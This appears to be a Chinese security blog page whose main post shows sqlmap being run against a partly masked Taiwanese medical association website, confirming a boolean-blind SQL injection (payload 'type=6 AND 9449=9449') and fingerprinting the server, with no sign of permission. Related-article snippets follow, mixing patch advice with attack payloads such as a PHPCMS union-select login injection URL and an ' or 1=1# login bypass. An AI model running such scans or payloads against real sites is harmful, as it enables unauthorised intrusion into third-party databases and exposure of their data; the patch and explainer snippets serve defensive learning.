台湾某医学会sql注入漏洞

直接上sqlmap神器

PS C:\security tools\sqlmap-master> python.exe .\sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
         _
 ___ ___| |_____ ___ ___  {1.0.5.46#dev}
|_ -| . | |     | .‘| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all ap
d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:12

[20:17:12] [INFO] testing connection to the target URL
[20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. ‘--timeout=10‘)
[20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:17:15] [WARNING] WAF/IDS/IPS product hasn‘t been identified (generic protection response)
[20:17:15] [INFO] testing if the target URL is stable
[20:17:16] [INFO] target URL is stable
[20:17:16] [INFO] testing if GET parameter ‘type‘ is dynamic
[20:17:17] [INFO] confirming that GET parameter ‘type‘ is dynamic
[20:17:17] [INFO] GET parameter ‘type‘ is dynamic
[20:17:17] [INFO] heuristic (basic) test shows that GET parameter ‘type‘ might be injectable (possible DBMS: ‘Microsoft SQL Server‘)
[20:17:17] [INFO] testing for SQL injection on GET parameter ‘type‘
it looks like the back-end DBMS is ‘Microsoft SQL Server‘. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘Microsoft SQL Server‘ extending provided level (1) and risk (1) values? [Y/n] 1
[20:17:25] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause‘
[20:17:27] [INFO] GET parameter ‘type‘ seems to be ‘AND boolean-based blind - WHERE or HAVING clause‘ injectable
[20:17:27] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause‘
[20:17:27] [INFO] testing ‘Microsoft SQL Server/Sybase inline queries‘
[20:17:27] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries (comment)‘
[20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option ‘--time-sec‘ as possible (e
[20:17:40] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind‘
[20:17:43] [INFO] testing ‘Generic UNION query (NULL) - 1 to 20 columns‘
[20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:17:45] [INFO] checking if the injection point on GET parameter ‘type‘ is a false positive
[20:17:48] [WARNING] it appears that the character ‘>‘ is filtered by the back-end server. You are strongly advised to rerun with the ‘--tamper=between
GET parameter ‘type‘ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=6 AND 9449=9449
---
[20:18:04] [INFO] testing Microsoft SQL Server
[20:18:04] [INFO] confirming Microsoft SQL Server
[20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:18:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times
时间: 2024-10-29 04:12:04

台湾某医学会sql注入漏洞的相关文章

微擎SQL注入漏洞

漏洞名称:微擎SQL注入漏洞 补丁文件:/web/source/mc/card.ctrl.php 补丁来源:阿里云云盾自研 漏洞描述:微擎CMS的/web/source/mc/card.ctrl.php中,对cardid输入参数未进行严格类型转义,导致SQL注入的发生 解决方法 搜索代码 if ($do == 'manage') 如下图: 在 201 行 前添加代码 $_GPC['cardid'] = intval($_GPC['cardid']); 修改后如图: 补丁文件:/web/sourc

PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/phpcms_v9/index.php?m=member&c=index&a=login dosubmit=1&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2

关于ECSHOP中sql注入漏洞修复

公司部署了一个ecshop网站用于做网上商城使用,部署在阿里云服务器上,第二天收到阿里云控制台发来的告警信息,发现ecshop网站目录下文件sql注入漏洞以及程序漏洞 如下图: 与技术沟通未果的情况下,网上查了点资料,对其文件进行修复,如下修改: 1,/admin/shopinfo.php修复方法 (大概在第53.71.105.123行,4个地方修复方式都一样)     admin_priv('shopinfo_manage');      修改为     admin_priv('shopinf

jdbc mysql crud dao模型 sql注入漏洞 jdbc 操作大文件

day17总结 今日内容 l JDBC 1.1 上次课内容总结 SQL语句: 1.外键约束:foreign key * 维护多个表关系! * 用来保证数据完整性! 2.三种关系: * 一对多: * 一个客户可以对应多个订单,一个订单只属于一个客户! * 建表原则: * 在多的一方创建一个字段,作为外键指向一的一方的主键!!! * 多对多: * 一个学生可以选择多个课程,一个课程也可以被多个学生选择! * 建表原则: * 创建第三张表,第三张表中放入两个字段,作为外键分别指向多对多双方的主键! *

利用SQL注入漏洞登录后台的实现方法 。。。。转载

一.SQL注入的步骤 a) 寻找注入点(如:登录界面.留言板等) b) 用户自己构造SQL语句(如:' or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收请求,并将该请求解释成机器代码指令,执行必要的存取操作 e) DBMS接受返回的结果,并处理,返回给用户 因为用户构造了特殊的SQL语句,必定返回特殊的结果(只要你的SQL语句够灵活的话). 下面,我通过一个实例具体来演示下SQL注入 二.SQL注入实例详解(以上测试均假设服务器未开启magic

zabbix 爆高危 SQL 注入漏洞,可获系统权限(profileIdx 2 参数)

漏洞概述 zabbix是一个开源的企业级性能监控解决方案.近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限. 影响程度 攻击成本:低 危害程度:高 是否登陆:不需要 影响范围:2.2.x, 3.0.0-3.0.3.(其他版本未经测试) 漏洞测试 在zabbix地址后面添加这串url jsrpc.php?type=9&method=s

知名CMS软件Joomla 存SQL注入漏洞

  近日,Trustwave SpiderLabs 研究员Asaf Orpani 发现知名CMS Joomla 3.2-3.4.4版本中存在SQL注入漏洞,经安全狗实验室检测该漏洞危害巨大,影响范围广,利用难度低.目前官方已在3.4.5版本中修复该漏洞,请相关网站及时更新.另外,经测试安全狗可防御该漏洞. 漏洞详细说明与利用方法 据 Asaf Orpani 分析得出,该SQL注入漏洞存在于 /administrator /components /com_contenthistory/ model

WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门参考大量前辈们的心得,小小的总结一下,欢迎大家拍砖啊 一.跨站脚本攻击(XSS) 跨站脚本攻击的原理 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时

预处理prepareStatement是怎么防止sql注入漏洞的?

序,目前在对数据库进行操作之前,使用prepareStatement预编译,然后再根据通配符进行数据填值,是比较常见的做法,好处是提高执行效率,而且保证排除SQL注入漏洞. 一.prepareStatement的预编译和防止SQL注入功能 大家都知道,java中JDBC中,有个预处理功能,这个功能一大优势就是能提高执行速度尤其是多次操作数据库的情况,再一个优势就是预防SQL注入,严格的说,应该是预防绝大多数的SQL注入. 用法就是如下边所示: String sql="update cz_zj_d